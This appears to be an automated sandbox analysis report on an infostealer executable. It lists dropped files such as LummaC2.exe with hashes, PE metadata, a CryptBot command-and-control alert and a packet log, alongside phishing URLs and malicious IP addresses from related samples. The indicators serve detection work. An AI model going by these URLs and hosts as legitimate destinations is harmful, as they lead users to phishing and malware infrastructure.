                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            VANNINVENTURESGBFYQ6Ee6gbS.exeGet hashmaliciousCryptbotBrowse
                                            • 176.53.147.104
                                            random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 176.53.146.223
                                            random(3).exeGet hashmaliciousCryptbotBrowse
                                            • 176.53.146.223
                                            Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                            • 176.53.146.223
                                            joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                            • 176.53.146.223
                                            JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                            • 176.53.146.223
                                            ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                            • 176.53.146.223
                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                            • 176.53.146.212
                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                            • 176.53.146.212
                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                            • 176.53.146.212
                                            AMAZON-AESUS5vrRrFN56j.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            res.ppc.elfGet hashmaliciousUnknownBrowse
                                            • 44.201.61.229
                                            res.mips.elfGet hashmaliciousUnknownBrowse
                                            • 54.24.210.36
                                            res.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 54.175.16.42
                                            res.mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 34.199.188.151
                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                            • 18.235.164.84
                                            https://adopt0098.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                            • 52.6.240.60
                                            http://tall-orchid-wolfsbane.glitch.me/home.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 34.233.109.53
                                            https://darkened-chalk-system-noolrgfa.glitch.me/Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                            • 35.172.94.107
                                            https://ali0gkhgh.weeblysite.com/Get hashmaliciousUnknownBrowse
                                            • 3.233.158.25

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jo0PnKm2Lg.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\jo0PnKm2Lg.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):425
                                            Entropy (8bit):5.353683843266035
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                            C:\Users\user\AppData\Local\Temp\LummaC2.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\jo0PnKm2Lg.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):328192
                                            Entropy (8bit):6.7838215637977495
                                            Encrypted:false
                                            SSDEEP:6144:a3VUD8LkbASEQJYMm+l0s0UddmR6ZPcF3tVOTjoBwS0vEA:auDYkbAtQJ30udEyPq3iTjo2Lr
                                            MD5:8DA89B163D506BE4A73B987517A1B9E4
                                            SHA1:2E110CF5160C511FA3D5843E890B8E9316754F34
                                            SHA-256:EA56E7F640355598346FA0B356699298314E25D809F3AA7CFCE1804A3D1964E5
                                            SHA-512:A85969BCDA0B31CAF0CEC79F45BEC068A498C7AC190FE17D7B7C03F88F5C91F5F6221FCC4FCB46604695D5B95E9047DFC1D2CF31207540C23E929FCCA08D14F5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 68%
                                            Reputation:low
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....vg.................L..........0.............@.......................................@..................................~...............................p...<..................................................D................................text....K.......L.................. ..`.rdata...#...`...$...P..............@..@.data...|........R...t..............@....reloc...<...p...<..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\Set-up.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\jo0PnKm2Lg.exe
                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                            Category:dropped
                                            Size (bytes):7920776
                                            Entropy (8bit):5.999710562047283
                                            Encrypted:false
                                            SSDEEP:49152:fzHJcgg9WcnmdpY+RQCcUVTTyXcrlogXIu9zt8e1fW8hu4ARsmK2bOAPyz8bWP8y:fzSmcnJ+GKtGcRosIUz1SrKkyz8w
                                            MD5:53D48938C0EC850EB316CF433ECFC045
                                            SHA1:4415A85E1376C1A8F6661A2CC9D23EC06557D176
                                            SHA-256:F63F7D8DB3AE8ED7448672263CF9333E8B867BDBA7A30D73CF3966CFD8A8A909
                                            SHA-512:21A69B5969F95E4DFD404E6C415EC502282F4E54AA73C0752A29AF52BDBF603837DDAB640BCA47C317F391F91A5F60818D5F06662C600F5E01E43E2473408C99
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 75%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.{g...............(..Q...x..2........... Q...@..........................Py.......y...@... ...............................u..-....................x.......v..L...........................~t.......................u. ............................text.....Q.......Q.................`..`.data........ Q.......Q.............@....rdata..8.....`......._.............@..@.eh_framdM... u..N....u.............@..@.bss.....1...pu..........................idata...-....u......Vu.............@....CRT....0.....u.......u.............@....tls..........u.......u.............@....reloc...L....v..N....u.............@..B........................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.011469950133826
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:jo0PnKm2Lg.exe
                                            File size:8'259'584 bytes
                                            MD5:8398fc4aa3a5a5ab6ae7ed394b449d0a
                                            SHA1:820ce4bb8eb51e31effa41e6829e84089b728760
                                            SHA256:f25fab3f64bad2cd989035dd854b761fe06b97e76291bd180991d21d91ea5c22
                                            SHA512:a44ff33aa8b477ee8a2bae6a3ac93da85df9a5fdf906baaa54b2513396df94b304bc626159e4d95561097bd3d112826e4254069320fc95f3fc167d9350234c61
                                            SSDEEP:98304:mHZ28VaNl6GdtOjCiEj5P6pziE5Psj1ZC/bIMqiiTpYXHQtG5nuPAUV:m6ThtSpeqso4iKG5n
                                            TLSH:8186BF105E3F919A88A06C326FEF377B94254656FF7582648D0B944ADC862D380FCADF
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g..................}...........~.. ... ~...@.. .......................`~...........@................................

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0xbe1cce
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x677EDAC1 [Wed Jan 8 20:06:25 2025 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7e1c740x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e20000x4d8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e40000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x7dfcd40x7dfe008eba363e17145ac78ce84cf6d4b790f5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x7e20000x4d80x6006a35d7fa5c9bc8c9007ad04916d77472False0.375data3.7187861734965906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x7e40000xc0x20027093ca5caccb61d191ff082f6e90674False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "~"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x7e20a00x244data0.47413793103448276
                                            RT_MANIFEST0x7e22e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-01-12T17:45:21.989992+01002059018ET MALWARE CryptBot CnC Checkin1192.168.2.549723176.53.147.10480TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 12, 2025 17:45:18.884525061 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:18.884572983 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:18.884625912 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:18.887902021 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:18.887917995 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.588044882 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.590246916 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.590267897 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.591516018 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.593147039 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.593147039 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.593228102 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.638757944 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.638782978 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.640336990 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.683325052 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.744743109 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.744852066 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:19.746253014 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.773986101 CET49720443192.168.2.53.210.94.60
                                            Jan 12, 2025 17:45:19.774004936 CET443497203.210.94.60192.168.2.5
                                            Jan 12, 2025 17:45:21.926278114 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.931058884 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.931149006 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.936119080 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.940962076 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.940973997 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.940999031 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941009045 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941054106 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.941060066 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941068888 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.941071033 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941081047 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941119909 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.941198111 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941217899 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941239119 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.941243887 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.941272974 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.941293955 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.945871115 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.945882082 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.945930958 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.945935011 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.945945024 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.945969105 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.945981026 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.945986032 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.946010113 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.946018934 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.946063995 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:21.989835024 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:21.989991903 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.037822962 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.037930012 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.085894108 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.085988998 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.133815050 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.133934975 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.185837030 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.185931921 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.237847090 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.237955093 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.285847902 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.289302111 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.341836929 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.342272997 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.389870882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.390048981 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.437819004 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.437885046 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.485853910 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.485950947 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.537863970 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.537966013 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.589873075 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.590163946 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.618673086 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.618875027 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.618958950 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.623768091 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.623831034 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.623833895 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.623863935 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.623889923 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.623917103 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.623922110 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.623950005 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.623969078 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.623984098 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.623994112 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624011040 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624025106 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624054909 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624077082 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624130011 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624130011 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624159098 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624176979 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624190092 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624212980 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624243021 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624259949 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624270916 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624299049 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624329090 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624378920 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624408960 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624439001 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624466896 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624494076 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624520063 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624571085 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624612093 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624639988 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624666929 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624694109 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624722004 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624814987 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624814987 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624844074 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624876976 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624897003 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624898911 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624927044 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624942064 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624954939 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624972105 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.624982119 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.624994040 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.625009060 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625036001 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.625036001 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625051022 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.625077009 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.625077009 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625103951 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625118017 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.625130892 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625153065 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.625160933 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625216007 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.625245094 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.626086950 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.626151085 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.626195908 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630182028 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630212069 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630240917 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630254030 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630304098 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630332947 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630362034 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630388975 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630438089 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630465984 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630494118 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630521059 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630575895 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630604982 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630631924 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630678892 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630707026 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630733967 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630808115 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630837917 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630865097 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630892992 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630920887 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630970001 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.630999088 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631026983 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631053925 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631081104 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631108046 CET8049723176.53.147.104192.168.2.5
